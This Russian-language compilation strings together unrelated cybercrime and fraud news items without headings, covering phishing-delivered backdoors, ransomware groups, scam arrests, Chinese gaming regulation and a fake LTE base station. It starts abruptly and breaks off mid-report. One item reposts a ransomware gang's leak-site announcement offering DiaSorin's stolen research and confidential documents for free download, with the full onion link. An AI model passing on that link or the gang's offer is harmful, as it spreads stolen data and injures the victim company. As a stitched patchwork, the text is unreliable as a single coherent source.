Атака по времени (англ. Timing attack) – атака по сторонним каналам, в которой атакующий пытается скомпрометировать криптосистему с помощью анализа времени, затрачиваемого на исполнение криптографических алгоритмов. Каждая логическая операция требует времени на исполнение на компьютере, и это время может различаться в зависимости от входных данных. Располагая точными измерениями времени для разных операций, атакующий может восстановить входные данные.
Xing Locker Ransomware gang just updated on the Name and Shame onion website about a new victim, "DiaSorin ".
About DiaSorin: (Total Revenue 155 Million)
DiaSorin is an Italian multinational biotechnology company that produces and
markets in vitro diagnostics reagent kits used in immunodiagnostics and
molecular diagnostics. The group was founded in 2000 and is headquartered in
Saluggia, Italy. Its production is at several plants located in Europe and the
United States: Saluggia and Gerenzano (Italy), Dietzenbach (Germany),
Stillwater, Minnesota (US), Dartford (UK). The company is a constituent of the
FTSE Italia Mid Cap index. The Group is active in the development, production
and marketing of diagnostic tests used by the medical community to assess a
patient's values, understand their state of health or monitor the progression
of a disease.
Xing Locker Says: "We present a diamond - 200 GB of research, engineering, projects and confidential documents of DiaSorin Group. Databases, emails, backups, drawings - all documents are available for free download! You can use all this absolutely free of charge!"
Onion Link : http://xingnewj6m4qytljhfwemngm7r7rogrindbq7wrfeepejgxc3bwci7qd.onion/target/diasorin
Техасец Марк Хопкинс (Mark Hopkins), известный под псевдонимом «Доктор Биткоин», признал себя виновным в организации незаконного бизнеса по обмену денежных средств, в том числе на криптовалюты.
Согласно заявлению Министерства юстиции США, Хопкинс получал комиссионные за обмен наличных денег на биткоины. При этом источник средств клиентов он не проверял, равно как не проводил необходимые процедуры по идентификации пользователей. Он признался, что не получал лицензии на осуществление деятельности по обмену денег и не зарегистрировал свою компанию.
По правилам Сети по борьбе с финансовыми преступлениями США (FinCEN), компании, обменивающие деньги, в том числе и на криптовалюты, должны соблюдать требования по противодействию отмыванию доходов. Также такие компании должны сообщать регулятору о подозрительных транзакциях на сумму свыше $2 000.
Как стало известно следователям, помимо незарегистрированного бизнеса Хопкинс помог одному из клиентов обменять деньги, полученные в лотерейном мошенничестве в Нигерии. Клиент с помощью «Доктора Биткоина» совершил 37 транзакций на сумму «от $550 000 до $1.5 млн». Суд приговорил Марка Хопкинса к пяти годам тюрьмы.
• Source: justice[.]gov/usao-ndtx/pr/doctor-bitcoin-pleads-guilty-illegal- cash-crypto-scheme
В октябре 2023 года специалисты компании «Доктор Веб» расследовали инцидент, связанный с целевой кибератакой на российское машиностроительное предприятие. Атака началась с рассылки фишинговых писем с темой «расследования» неких уголовных дел по уклонению от уплаты налогов.
Письма якобы отправлялись с подменного адреса от имени следователя Следственного комитета РФ. В них содержались вложения - защищенный паролем zip-архив с вредоносной программой и pdf-документ, который не являлся вредоносным. Он содержал фишинговый текст о том, что вся информация об «уголовном деле» находится в архиве, и побуждал открыть вредоносную программу из него.
Самое первое фишинговое письмо содержало архив Требование 19098 Cлед ком РФ от 02.10.23 ПАРОЛЬ - 123123123.zip. В свою очередь, расположенная в нем троянская программа скрывалась в файле Перечень юридических лиц и предприятий, уклонение от уплаты налогов, требования и дополнительные.exe.
Одним из последних отправленных сообщений стало следующее:
К нему был прикреплен фишинговый pdf-документ Требование следователя, уклонение от уплаты налогов (запрос в рамках УД).pdf и zip-архив Трeбoвaниe 19221 СК РФ от 11.10.2023 ПАРОЛЬ - 123123123.zip с таким содержимым:
Как и в более ранних сообщениях, пароль для извлечения файлов из архива атакующие указали и в его названии, и в имени документа Пароль для открытия 123123123.odt. Сам этот документ, как и файлы Права и обязанности и процедура ст. 164, 170, 183 УПК РФ.pdf и СК РФ.png , не являлись вредоносными.
В этом архиве находилось две копии вредоносной программы: Перечень предприятий, уклонение от уплаты налогов, а также дополнительные материалы.exe и Дополнительные материалы, перечень вопросов, накладные и первичные документы.exe.
Во всех случаях распространяемым злоумышленниками вредоносным приложением был Trojan.Siggen21.39882. Эта вредоносная программа, известная как WhiteSnake Stealer, обладала возможностью кражи учетных данных и установки дополнительных вредоносных программ на компьютеры жертв. Этот троян, распространяемый через даркнет, послужил первым этапом заражения. Получив соответствующие команды, вредоносная программа собрала и передала злоумышленникам информацию о конфигурации профилей Wi-Fi-сетей инфицированной системы, а также пароли доступа к ним. После чего активировался бэкдор JS.BackDoor.60, который и стал основным инструментом взаимодействия злоумышленников с зараженными системами.
Хронология атаки
JS.BackDoor.60 написан на JavaScript и состоит из основного зашифрованного тела и вспомогательных модулей. Через общие функции модули представляют собой дополнительные вредоносные задачи, которые бэкдор может выполнять. Новые модули поступают с удаленного сервера, расширяя возможности трояна.
Для сокрытия своего присутствия JS.BackDoor.60 модифицировал ярлыки в системных каталогах, включая Рабочий стол и Панель задач. В результате при открытии любого ярлыка сначала запускался бэкдор, а затем исходная программа.
Используя JS.BackDoor.60, злоумышленники удаленно управляли зараженной системой и похитили данные из десятков каталогов, включая личные и корпоративные документы. Также хакеры создавали скриншоты с экрана жертвы.
Для аудиоконтроля атакующие задействовали еще один вредонос - BackDoor.SpyBotNET.79. Этот бэкдор записывал звук через микрофон компьютера, но только при обнаружении интенсивности, характерной для человеческого голоса.
Хронология получения задач трояном JS.BackDoor.60
При этом атакующие пытались также заразить систему трояном-загрузчиком Trojan.DownLoader46.24755, однако из-за возникшей ошибки сделать это им не удалось.
По итогам анализа эксперты «Доктор Веб» не смогли связать атаку с известными APT-группировками. Однако инцидент демонстрирует серьезную угрозу от доступных коммерческих вредоносов и социальной инженерии как метода заражения.
Компаниям рекомендуется усилить защиту ИТ-инфраструктуры, особенно рабочих станций и почтовых шлюзов. Также крайне важно регулярно обучать сотрудников правилам кибербезопасности и информировать об актуальных угрозах вредоносного ПО и фишинга.
Председатель Комитета Госдумы по информационной политике, информационным технологиям и связи Александр Хинштейн заявил 23 января на пленарном заседании палаты, что в России может быть введена ответственность за несанкционированное использование чужого голоса и изображения.
Поводом для этого стало обсуждение в Госдуме 23 января законопроектов , ужесточающих ответственность за утечки персональных данных. Первый зампред думского Комитета по науке и высшему образованию Олег Смолин поднял проблему распространения дипфейков – подделок чужого голоса и изображения с помощью технологий искусственного интеллекта.
По словам Смолина, дипфейки активно используются в мошеннических целях, а отличить их от реальных людей сложно. Он предложил при подготовке законопроектов ко второму чтению ввести ответственность за использование дипфейков с целью мошенничества и дискредитации.
Александр Хинштейн заверил, что эта проблема уже прорабатывается депутатами совместно с профильными ведомствами. По его словам, соответствующая законодательная инициатива будет внесена путем поправок в базовый закон о персональных данных. Сроки ее подготовки пока неизвестны.
sc: pnp.ru/economics/khinshteyn-soobshhil-o-podgotovke-zakonoproekta-protiv- dipfeykov.html
Мошенники вынудили продать москвича две квартиры, а затем прислали ему букет из искусственных цветов, обвязанный черной лентой, с запиской с угрозами в адрес него и его семьи. Об этом 15 января сообщил источник «Известий».
Как отметил мужчина, в середине октября 2023 года ему позвонил неизвестный, представившийся следователем. Тот сообщил, что в разработке находится уголовное дело в отношении мошенницы, которая может украсть деньги с его банковского счета.
Затем жертве позвонил якобы представитель банка, который рассказал, что нужно предпринять для сохранения денег. Москвич подписал расписку о неразглашении сведений, поэтому в полицию не обращался. В ноябре следователь снова позвонил, сообщив, что вероятна мошенническая схема с квартирой его жены, в связи с чем москвич убедил ее продать квартиру.
Злоумышленник, представившийся следователем, сообщил, что с ним свяжется риелтор для помощи в продаже. Позднее на адрес места жительства пришла риелтор-мошенница с помощником. Они сообщили, что цена продажи квартиры будет составлять 23 млн рублей с учетом услуг, и договорились, что вскоре придут с покупателем.
Сделка по продаже квартиры была оформлена, 22 млн рублей были переведены на счет.
В конце ноября ему позвонил неизвестный, который сообщил, что поскольку он продал квартиру, которую хотел купить, он должен заплатить ему. Испугавшись, москвич позвонил «следователю», сообщив о подозрительном звонке, на что тот ответил, что это пособник мошенницы, и предложил продать вторую квартиру — при передаче денежных средств он будет задержан, а сделка аннулируется.
После просмотра квартиры предполагаемым покупателем в конце декабря был подписан договор купли-продажи квартиры, документы были направлены в Росреестр для проверки, ответа до настоящего времени не получено и денежные средства также не получены. По словам мужчины, общий ущерб превысил 40 млн рублей.
Всплыла еще одна история с жуликами, которые контролировали ПВЗ крупного маркетплейса и присваивали содержимое заказов.
В данном случае речь идет о ПВЗ Wildberries. Но мы все знаем, что товары исчезают и подменяются после попадания в ПВЗ некоторых других маркетплейсов даже чаще. И там что-то не слышно про уголовные дела, никто не напрягается.
Рассказываем, что вышло на этот раз.

Для реализации своих преступных планов группа злоумышленников за 160 тысяч
рублей купила ПВЗ в Орехово-Зуево. Формальным владельцем бизнеса был некий
Курбанов Бахман Габил Оглы.
После этого подставные лица начали совершать заказы дорогостоящих товаров, а затем оформляли возврат.
К возврату мошенники оформляли уже коробки без техники, а их содержимое (ноутбуки, смартфоны и шлемы виртуальной реальности) выносили из помещения и присваивали. Камеры в это время просто показывали картинку онлайн и не сохраняли записи.
Подставные покупатели получали свой процент за хлопоты.
За месяц работы схемы жулики успели нанести Wildberries и его продавцам ущерб на сумму 25,2 млн рублей.
Компания обратились в полицию, возбуждено уголовное дело. Пока правоохранители допросили только 22-летнего сотрудника ПВЗ, который стал подозреваемым. Его сообщников ищут.
Мошенникам грозит до 10 лет колонии.
Хакеры с нуля переписали код, чтобы стать невидимыми и неуязвимыми.
Исследователи IBM Security X-Force Threat заявили , что группа вымогателей RansomExx перешла на язык программирования Rust , который дает хакерам способность быть невидимыми.
По словам реверс-инженера IBM Security X-Force Шарлотта Хаммонд, вредоносное ПО на Rust имеет более низкие показатели обнаружения антивирусными программами, что облегчает злоумышленникам обход защиты. Новый образец, использованный для отчета IBM, обнаруживается только 14 из более 60-ти антивирусов на VirusTotal.
Эксперты заявили, что RansomExx не просто обновляют существующую кодовую базу – они воссоздают код с нуля на совершенно новом языке с другим синтаксисом и набором библиотек.
Как пояснили в IBM, разработчики RansomExx также создали вредоносное ПО PyXie, загрузчик Vatet и штаммы программ-вымогателей Defray . Новый вариант RansomExx2 создан для Linux и Windows.
Эксперты IBM добавили, что многие группировки создали свои собственные варианты Rust, в том числе BlackCat , Hive и Zeon .
Исследователи заявили, что популярность языка программирования Rust среди хакеров в течение последнего года неуклонно росла благодаря его кроссплатформенной поддержке и низким показателям обнаружения. Процесс компиляции Rust также приводит к более сложным двоичным файлам, анализ которых может занять больше времени у реверс-инженеров.
По словам Хаммонд, более низкие показатели обнаружения антивирусных программ для двоичных файлов Rust можно объяснить тем, что язык используется гораздо реже, поэтому поставщики антивирусных программ будут иметь меньше сигнатур для него и меньше доступных образцов для обучения своих систем обнаружения.
«Если язык Rust продолжит использоваться разработчиками вредоносных программ, то поставщики антивирусов начнут наращивать свои возможности по его обнаружению, и поэтому его преимущества по сравнению с другими языками уменьшатся. Тогда хакеры переключатся на другие языки», — сказала Хаммонд.
source: securityintelligence.com/posts/ransomexx-upgrades-rust
Обновленный BianLian бьет все рекорды и подстраивается под каждую ОС.
Согласно отчету ИБ-компании [redacted], в августе операторы нового кроссплатформенного вымогателя BianLian расширили свою инфраструктуру управления и контроля (C&C) и увеличили скорость атаки. BianLian , написанный на Go, был впервые обнаружен в июне 2022 года и уже атаковал 15 организаций.
Первоначальный доступ к сетям жертв достигается за счет использования уязвимостей ProxyShell в Microsoft Exchange Server, используя его для сброса веб-шелла или полезной нагрузки ngrok для последующих действий. BianLian также нацелен на VPN-устройства SonicWall для их дальнейшей эксплуатации .
Время пребывания BianLian в сети составляет до 6 недель с момента первоначального доступа и шифрования, что значительно превышает среднее время (15 дней) в 2021 году.
Помимо использования методов LotL-атаки (Living off the Land) для профилирования сети и бокового перемещения, группа также использует специальный бэкдор для поддержания постоянного доступа к сети. Бэкдор позволяет доставить произвольные полезные нагрузки с удаленного сервера, загрузить в память и выполнить их.
BianLian может загружать серверы в безопасном режиме Windows для запуска своей вредоносной программы и оставаться незамеченным для системы защиты ОС.
По данным Cyble , целями хакеров BianLian являются компании из следующих областей:
СМИ (25%);
банковская и финансовая сфера (12,5%);
энергетика (12,5%);
производство (12,5%);
образование (12,5%);
здравоохранение (12,5%);
профессиональные услуги (12,5%).
Большинство компаний базируются в Северной Америке, Великобритании и Австралии.
BianLian является еще одной программой-вымогателем, разработанной на языке Go, что позволяет злоумышленникам быстро вносить изменения в единую кодовую базу, которую затем можно скомпилировать для нескольких платформ.
По словам исследователей, операторы BianLian хорошо разбираются в методологии Living off the Land, чтобы совершать боковое перемещение, корректируя свои операции в зависимости от возможностей и средств защиты сети.
Ранее было обнаружено еще одно новое вредоносное ПО Agenda, которое написано на Go и использовалось для атак на предприятия в Азии и Африке . Злоумышленник использовал общедоступный сервер Citrix в качестве точки входа.
source:
redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go
blog.cyble.com/2022/08/18/bianlian-new-ransomware-variant-on-the-rise
24 ноября 2021 года киберспециалисты Службы безопасности Украины рассказали об аресте пятерых членов группы международных хакеров Phoenix. Их задержания проходили в Киеве и Харькове.
Правоохранительные органы пояснили, что все задержанные имеют высшее техническое образование, а вместе они занимались преступной деятельностью не менее двух лет. Хакеры специализировались на удаленном взломе мобильных устройств с помощью фишинговых сервисов и легализации украденных смартфонов Apple путем их разблокировки и перепривязки аккаунта.
По информации Bleeping Computer, хакерская группа Phoenix уже несколько лет занимается незаконным получением удаленного доступа к учетным записям пользователей мобильных устройств, а затем их монетизацией путем взлома их электронных платежей или банковских счетов или продажи их личной информации третьим лицам.
Для кражи мобильных учетных записей пользователей мобильных устройств злоумышленники использовали фишинговые сайты, являющиеся клонами порталов входа в систему Apple и Samsung. Хакеры также предлагали услуги третьим лицам по удаленному взлому смартфонов по цене от $100 до $200.
В ходе задержания эксперты СБУ обнаружили у хакеров множество смартфонов без документов, которые готовились на продажу под видом новых, специальное ПО и компьютерную технику для их взлома, а также документацию об их незаконной деятельности и архивы со скопированной информацией владельцев смартфонов, которые хакеры выставлялись на продажу в даркнете.
После задержания и проведения следственных действий хакерам будет предъявлено обвинение в нарушении статьи 361 Уголовного кодекса Украины «Несанкционированное вмешательство в работу электронно-вычислительных машин (компьютеров), автоматизированных систем, компьютерных сетей или сетей электросвязи».
Video:
До восьми лет лишения свободы грозит мужчине, который в течение двух месяцев под предлогом продажи несуществующего товара в сети Интернет обманывал жителей разных областей Украины.
Работники отдела противодействия киберпреступности в Запорожской области совместно со следователем Мелитопольского районного управления полиции ГУНП в Запорожской области, под процессуальным руководством окружной прокуратуры разоблачили местного жителя, который обоснованно подозревается в уголовном правонарушении, предусмотренном ч. 3 ст. 190 «Мошенничество» Уголовного кодекса Украины.
Досудебным расследованием установлено, что весной 2021, мужчина зарегистрировал несколько аккаунтов под вымышленными именами на популярной торговой Интернет-платформе. Для завладения средствами граждан, он размещал объявления о продаже мебели, бытовой техники и других товаров, которых в действительности не было и соответственно не мог реализовать.
В течение апреля-мая 2021, с целью приобретения товаров с виртуальным продавцом общались десять граждан, проживающих в Запорожской и Львовской областях, в городах Киев, Николаев и Днепр. Все они перечисляли средства в качестве предоплаты за товар на банковские карты «продавца», после чего заказанный товар не получили и не могли с ним связаться.
Заявления о мошеннических действиях неизвестного мужчины были зарегистрированы подразделениями полиции. В июне 2021 мошенника разоблачили работники отдела противодействия киберпреступности в Запорожской области Департамента киберполиции Национальной полиции Украины. Злоумышленником оказался ранее судимый за преступления в сфере служебной деятельности житель Мелитополя 1991 года рождения.
13 августа по его месту жительства правоохранители провели санкционированный обыск. Были изъяты банковские карточки, флэш-накопители, системный блок «Acer», планшет «Lenovo», мобильные телефоны с сим-картами. При изучении информации на компьютерной технике, полицейские обнаружили материалы, подтверждающие преступную деятельность фигуранта.
В ходе досудебного расследования следователем доказана причастность мужчины к 10 мошенническим эпизодам на общую сумму около 10 000 гривен. Под тяжестью полученных правоохранителями доказательств, фигурант признался в совершении правонарушений. Расследование продолжается. Санкция инкриминируемой статьи - лишение свободы на срок от трех до восьми лет, сообщает отдел коммуникации полиции Запорожской области.
• Source: https://ria-m.tv/news/254851/jitel_...pateley_prodavaya_cherez_internet_(foto).html
Китайские власти не сбавляют темпов в деле обвала капитализации интернет- гигантов. Сегодня волна дошла до крупнейшего из них — Tencent, основой бизнеса которого являются онлайн-игры. В партийной печати вышла разгромная статья об игровом бизнесе, где он был назван «духовным опиумом» и «электронными наркотиками», а Tencent — обвинен в намеренной эксплуатации слабости детей и подростков, разрушающей их психику. Компания потеряла в стоимости более $50 млрд и теперь пытается «разоружиться перед партией», подписываясь на добровольные ограничения.
Разгромная статья о порочном бизнесе онлайн-игр под заголовком «Духовный опиум вырос в индустрию с оборотом в сотни миллиардов» вышла во вторник в издании «Экономические новости», входящем в группу государственного агентства «Синьхуа». В статье рассказывается о взрывном росте интернет-зависимости среди детей и подростков и вредоносном влиянии онлайн-игр на их физическое и психическое здоровье.
Издание приводит шокирующие истории, например о студенте-игромане по имени Сяо Мин, зацикленном на игре King of Glory от Tencent. У него ухудшилась успеваемость, потом начались галлюцинации, в которых являлись персонажи игры. Студент начал разговаривать сам с собой, повторяя слово «убивать», а когда его семья отказалась давать ему деньги, порезал матери лицо ножом, а потом сжег дом своих бабушки дедушки. Его родители теперь судятся с Tencent, говорится в статье. В материале есть и интервью бывшей жены взрослого игромана, ушедшей от мужа: «Раньше при выборе супруга хватало, чтобы он не играл в казино и не ходил к проституткам — но теперь семьи разрушают и онлайн-игры».
За всеми этими несчастьями стоит взрывной рост индустрии мобильных онлайн-игр, «которые часто называют “духовным опиумом” и “электронным наркотиком”». Этот рынок в 2020 году вырос на четверть и достиг объема 209 млрд юаней ($32 млрд), а число компаний, производящих игры, превысило 280 тысяч. Крупнейший игрок с долей 54% — Tencent, в которой работают 14 тысяч разработчиков. Они постоянно работают над тем, чтобы сделать игры максимально аддиктивными, используя для извлечения прибыли слабости человеческой природы. Игровые платформы должны заботиться не только о своей прибыли, но и о социальной ответственности — внедрять системы, препятствующие формированию зависимости у малолетних, и охраняющие их от вредоносной информации, заключает партийное издание.
Спустя несколько часов из заголовка и самой статьи были удалены сравнения с наркотиками (хотя в перепечатках, в том числе на сайте главной партийной газеты «Жэньминь Жибао», они остались). Но капитализация Tencent за это время успела упасть на 11%, или более чем на $50 млрд. Вслед за ней обвалились акции второго игрока на китайском рынке, Netease, а также их японских конкурентов, значительная доля выручки которых приходится на китайский рынок. Инвесторы испугались, что рынок онлайн-игр может повторить судьбу рынка онлайн- образования, который китайские власти на прошлой неделе фактически уничтожили, обязав его участников перерегистрироваться как НКО. На прошлой неделе китайский фондовый регулятор провел конференс-колл с американскими инвестбанками, на котором убеждал их, что повторения не будет — но это никого не убедило.
Tencent через несколько часов после появления статьи выступила с самокритичным пресс-релизом — компания пообещала, что ограничит время игры в King of Glory для несовершеннолетних с полутора часов до часа по будням и с трех часов до двух по выходным. Детям до 12 полностью запретят покупки внутри игры. Кроме того, Tencent вынесла на общественную дискуссию предложение о полном запрете компьютерных игр детям младше 12 лет. Все это — опережающие обязательства по сравнению с действующими китайскими законами, но аналитики полагают, что разоружение перед партией не спасет Tencent: будет крайне удивительно, если за сравнением игр с наркотиками не последуют репрессивные действия регуляторов, сказал Bloomberg аналитик сингапурской DZT Research Ке Ян.
Атака на Tencent расстроила аналитиков, которые напряженно ждут повода для отскока китайских технологических акций после падения на 40% с февраля на фоне атаки властей на интернет-компании. «Единственный вывод, который из этого можно сделать, — мы еще не дошли до пика регуляторных рисков в Китае», — сказал Bloomberg аналитик Oanda Asia Pacific Джеффри Хелли.
Один литовский гражданин нашел через интернет сайт украинской компании, которая, как там было сказано, занималась финансами, инвестициями и торговлей на бирже. Заинтересовавшись данным видом пассивного заработка, мужчина зарегистрировался на сайте.
Вскоре после этого, с ним связался неизвестный, который представился сотрудником данной компании и в красочной форме расписал опыт компании в биржевой торговле и радужные перспективы сотрудничества с ней, благодаря опытным трейдерам, которые всегда готовы помочь клиентам советами, когда и куда инвестировать деньги, чтобы приумножить их благосостояние.
Воодушевившись обещаниями, литовец завел счет в системе и начал пополнять его. Деньги приходилось отправлять частями, каждый раз по новым реквизитам, которые указывали представители компании. Такая сложная система немного насторожила новоиспеченного инвестора, но поскольку все перечисленные средства, в конце концов, отображались на балансе торгового счета, мужчина успокоился.
За 7 месяцев своей «торговли на бирже», литовец «инвестировал» украинским интернет-трейдерам более 55 тысяч евро, не особо вникая, кто именно является получателем его денег, которые он отправлял украинцам через интернет-банкинг и системы денежных переводов. Торговля происходила по подсказкам трейдеров, через специально установленный интернет-терминал, который могли контролировать сотрудники брокерской компании.
И вот, однажды, деньги на торговом счету начали стремительно исчезать. Испугавшись, мужчина попытался связаться с представителями компании, однако все его попытки оказались безуспешными. Оставшись с пустым счетом и так и не получив ответа от своего брокера, инвестор оказался предоставлен сам себе.
Сделав неутешительный вывод, что его обманули, мужчина обратился в полицию, которая открыла расследование по данному факту. В рамках возбужденного уголовного дела, компетентные органы Литовской Республики обратились за правовой помощью в Офис Генерального Прокурора Украины.
В ходе расследования удалось установить, что деньги, отправленные гражданином Литвы с целью пополнения торгового счета в брокерской компании, поступали на счета физических лиц, пятеро из которых были установлены. В ответ на просьбу следователя, судья Голосеевского Суда г.Киева, выдал постановление на временный доступ к данным банка, которые бы позволили отследить передвижение денежных средств и их судьбу. Следствие продолжается.
Тема инвестиций является излюбленной среди мошенников, поскольку позволяет им достаточно легко получать значительные суммы денег от граждан, у которых есть лишние деньги, но не достает ума, чтобы приумножить их самостоятельно.
Интернет пестрит рекламой подобных проектов, от инвестиций и торговли на бирже, до «автоматической генерации прибыли при помощи распределенной сети и искусственного интеллекта», однако не следует слепо доверять им свои сбережения. Эта схема стара как мир, достаточно вспомнить хотя бы сказку про Буратино.
СБУ заблокировали в Виннице схему завладения деньгами граждан через виртуальные "брокерские услуги". Ежемесячный оборот нелегального бизнеса составил более 7 млн грн.
Установлено, что схему "обслуживали" почти 100 человек. Нелегальный бизнес просуществовал полгода.
По предварительным данным следствия, житель областного центра наладил работу трех подпольных "call-центров". Их операторы через ИР-телефонию подыскивали клиентов для регистрации на фиктивных брокерских интернет-платформах и пополнения специально созданных электронных счетов. После этого дельцы через сеть аффилированных фирм выводили деньги граждан в тень и обналичивали.
Во время следственных действий в офисных помещениях дельцов правоохранители обнаружили более 200 единиц компьютерной техники и телекоммуникационного оборудования, а также документацию с доказательствами противоправной деятельности.
Сейчас в рамках уголовного производства продолжаются следственно-оперативные действия для привлечения к ответственности лиц, причастных к противоправной схеме.
• Source: ssu.gov.ua/novyny/cbu-vykryla-merezhu-pidpilnykh-calltsentriv-yaki- shchomisiatsia-oshukuvaly-ukraintsiv-na-7-mln-hrn
Издание Bleeping Computer обратило внимание, что браузерное расширение ClearURLs, очищающее URL-адреса от любых трекеров, предназначенных для слежки и аналитики, было удалено из Chrome Web Store.
ClearURLs представлено как для Google Chrome, так и для Firefox и Edge. Журналисты объясняют, что многие сайты имеют длинные URL-адреса с дополнительными параметрами, которые не несут какой-либо функциональной ценности, но используются для отслеживания пользователей. Это может особенно относиться к ссылкам, присутствующим в информационных рассылках, например:
__
](https://example.com?utm_source=newsletter1&utm_medium=email&utm_campaign=sale&some_other_tracking_bits=...)
example.com
URL-адреса результатов поиска в Google ничем не отличаются и тоже содержат множество трекеров. Журналисты The Register демонстрируют разницу на примере Firefox с включенным и отключенным ClearURLs.


Теперь, когда расширение удалили Chrome Web Store, его разработчик Кевин Ройберт (Kevin Roebert) заявляет:
«Причины [блокировки] смехотворны, вероятно, они фиктивные, а дело в том, что ClearURL наносит ущерб бизнес-модели Google. ClearURLs выполнял свою миссию по предотвращению отслеживания по URL-адресам, а именно на этом Google зарабатывает деньги. Думаю, сейчас у ClearURLs так много пользователей, что Google этого не приветствует, и в компании хотели бы, чтобы этот аддон исчез навсегда».
Click to expand...
Разработчик рассказывает, что в Google ему сообщили, что описание расширения «слишком подробное» и тем самым нарушает правила Chrome Web Store:
«Упоминание всех людей, которые помогали разрабатывать и переводить ClearURL, противоречит правилам Google, потому что это может “сбить с толку” пользователей. Нелепость.
Описание ClearURL считается вводящим в заблуждение, потому что оно слишком подробное и описывает нерелевантные вещи. Что именно не имеет отношения к описанию расширения, в Google мне не сообщили. Поэтому мне трудно это исправить».Click to expand...
Также в Google заявили, что в описании расширения не упоминается, что оно содержит определенные функции, включая функции импорта и экспорта настроек, функцию ведения журнала и кнопку пожертвований, что якобы тоже вводит в заблуждение пользователей. Кроме того, компании не понравилось, что расширение без необходимости требует разрешение на запись в буфер обмена.

Ройберт ответил, что это неправда, а описания всех запрашиваемых разрешений можно найти в Chrome Web Store Developer Dashboard. Также изначально он опроверг утверждение Google и заявил, что у clipboardWrite есть простое объяснение: функция используется для записи «чистых» ссылок через контекстное меню в буфер обмена.
Позже разработчик прокомментировал Bleeping Computer, что в clipboardWrite в самом деле больше необходимости, это был «пережиток старой версии ClearURLs», а некоторое время назад он переключился на другой метод копирования в буфер обмена.
Интересно, что при этом во время обсуждения этой истории на Y Combinator Hacker News некоторые пользователи сообщали, что ранее расширение содержало уязвимость, позволяющую выполнит произвольный код. Другие комментаторы заявляли, что у ClearURLs есть и другие проблемы с безопасностью: «расширение может перенаправлять URL-адреса скриптов на произвольные источники, а список фильтров периодически обновляется со страницы GitLab, что позволяет поставщику списка фильтров выполнять целевые атаки».

В целом одни пользователи выражали резонное сомнение в том, что такая компания, как Google, могла настолько обеспокоиться из-за одного маленького расширения, которое якобы могло повлиять на бизнес-модель ИТ-гиганта. Другие писали, что огромное влияние Google на разработку расширений и веб-стандартов для Chrome может в конечном итоге стать проблемой, а случай с ClearURLs может свидетельствовать о том, что компания активно монополизирует эту область.
Также некоторые пользователи писали, что произошедшее лишь укрепило их желание и дальше использовать браузер Mozilla Firefox.
Журналисты отмечают, что пользователи Chrome все еще могут загрузить и вручную установить ClearURLs с GitHub. Более того, Ройберт подготовил новую версию 1.21.0 с которая скоро появятся в каталогах расширений Mozilla и Edge (пока версия ожидает проверки).
Представители Google пока никак не прокомментировали происходящее.
Источник: xakep.ru/2021/03/25/clearurls/
Итальянская полиция задержала гражданина Австралии, разыскиваемого в США за участие в международной кибермошеннической схеме, жертвами которой стали пожилые люди и другие уязвимые группы населения. По данным следствия, ущерб от действий преступной группы составил около 31 миллиона долларов США (примерно 46 миллионов австралийских долларов).
44-летний мужчина, имя которого пока не разглашается, был объявлен в международный розыск более трёх лет назад и, по информации полиции, является итало-австралийцем. Его задержание произошло в аэропорту Мальпенса в Милане после прибытия рейсом из Сингапура. Арест был осуществлён на основании ордера, выданного судом Северной Каролины, после расследования, проведённого совместно Федеральным бюро расследований США и итальянской киберполиции.
Схема мошенничества была построена на проникновении в компьютерные системы жертв. На экранах пользователей появлялось сообщение об ошибке, после чего следовала рекомендация обратиться в специальный колл-центр за технической поддержкой. Злоумышленники убеждали жертв произвести оплату за техническую помощь, однако никакого результата пострадавшие не получали. В результате действий этой группы злоумышленники смогли получить незаконные доходы в размере 31 миллиона долларов.
По данным полиции, преступная организация действовала по всему миру, однако точное количество пострадавших и их география, кроме США, пока остаются неясными. Неизвестно, сколько людей стали жертвами этой схемы за пределами Соединённых Штатов.
При задержании у подозреваемого обнаружили крупную сумму наличных в евро, несколько компьютеров, кредитные карты и дорогостоящие часы. В настоящее время австралиец находится в тюрьме Бусто-Арсицио, расположенной в 35 километрах к северу от Милана. В ближайшие двое суток задержанный предстанет перед судьей для решения вопроса об экстрадиции в США. В Соединенных Штатах мошеннику грозит до 30 лет лишения свободы по обвинениям в компьютерном мошенничестве, нарушении компьютерной безопасности и отмывании денег.
Столь длительный срок обусловлен тем, что среди пострадавших более 10 человек старше 55 лет. В июле итальянская полиция уже арестовывала другого киберпреступника, которого также разыскивало ФБР.
smh.com.au/world/europe/australian-wanted-by-fbi-over-alleged-46-million-scam- arrested-in-italy-20241020-p5kjpu.html
**Специалисты ПАО "Мегафон" закончили разработку программно-аппаратного
комплекса «Информационный периметр». **
По заявлениям разработчиков, ПАК позволяет эффективно защищать информацию на промышленных или иных участках, где предъявляются повышенные требования к защите коммерческой тайны и других важных сведений. Комплекс предназначен для оперативного развертывания доверенной сети с управлением правами доступа абонентов сотовой связи. Кроме того, его потенциал обеспечивает полный контроль действий абонентов на конкретной режимной территории.
Устройство - фейковая
базовая станция, устанавливается на защищаемом объекте (например в офисе, или
на производственной территории) и раздает абонентам сигнал LTE/GSM имеющий
параметры приоритетов выше, чем у "официальных" базовых станций. Абоненты,
попавшие в зону действия комплекса - подключаются к новой "частной" сети,
после чего шифрование канала связи принудительно отключается.
"Доверенные" абоненты выводятся в телефонную сеть через коммутатор/АТС
предприятия. Разговоры, СМС-сообщения можно записывать в архив.
"Не-доверенные" - абоненты блокируются + на пульт охраны отправляется
уведомление о появлении нарушителя на территории организации.
Предположительно, возможна интеграция данной системы в ядро коммуникационной
сети Мегафона по механизму, аналогичному интеграции фемтосот.
Презентация/описание комплекса: СКАЧАТЬ бесплатно без регистрации и СМС
Смишинг, поддельные сайты и трояны удалённого доступа помогли предприимчивому преступнику сколотить целое состояние.
Мексиканский хакер по кличке Neo_Net с июня 2021 по апрель 2023 года проводил множественные кибератаки на банки разных стран, в особенности в Испании и Чили, используя вредоносное ПО для Android-устройств. Об этом сообщил исследователь безопасности Пол Тилль в недавнем отчёте компании SentinelOne, выпущенном в сотрудничестве с VX-Underground.
Основным способом распространения мобильного вируса стал SMS-фишинг (смишинг), в рамках которого хакер пугал своих жертв ложными сообщениями о проблемах с их банковскими счетами и перенаправлял затем на поддельные банковские сайты, где собирал личные данные своих целей.
«Фишинговые страницы были тщательно настроены с помощью панелей PRIV8, и имели несколько защитных мер, включая блокировку запросов от десктопных браузеров и скрытие страниц от ботов и сканеров сети», — объяснил Пол Тилль.
«Эти страницы были разработаны так, чтобы максимально походить на настоящие банковские приложения, с анимацией и другими элементами для создания убедительной иллюзии», — добавил исследователь.
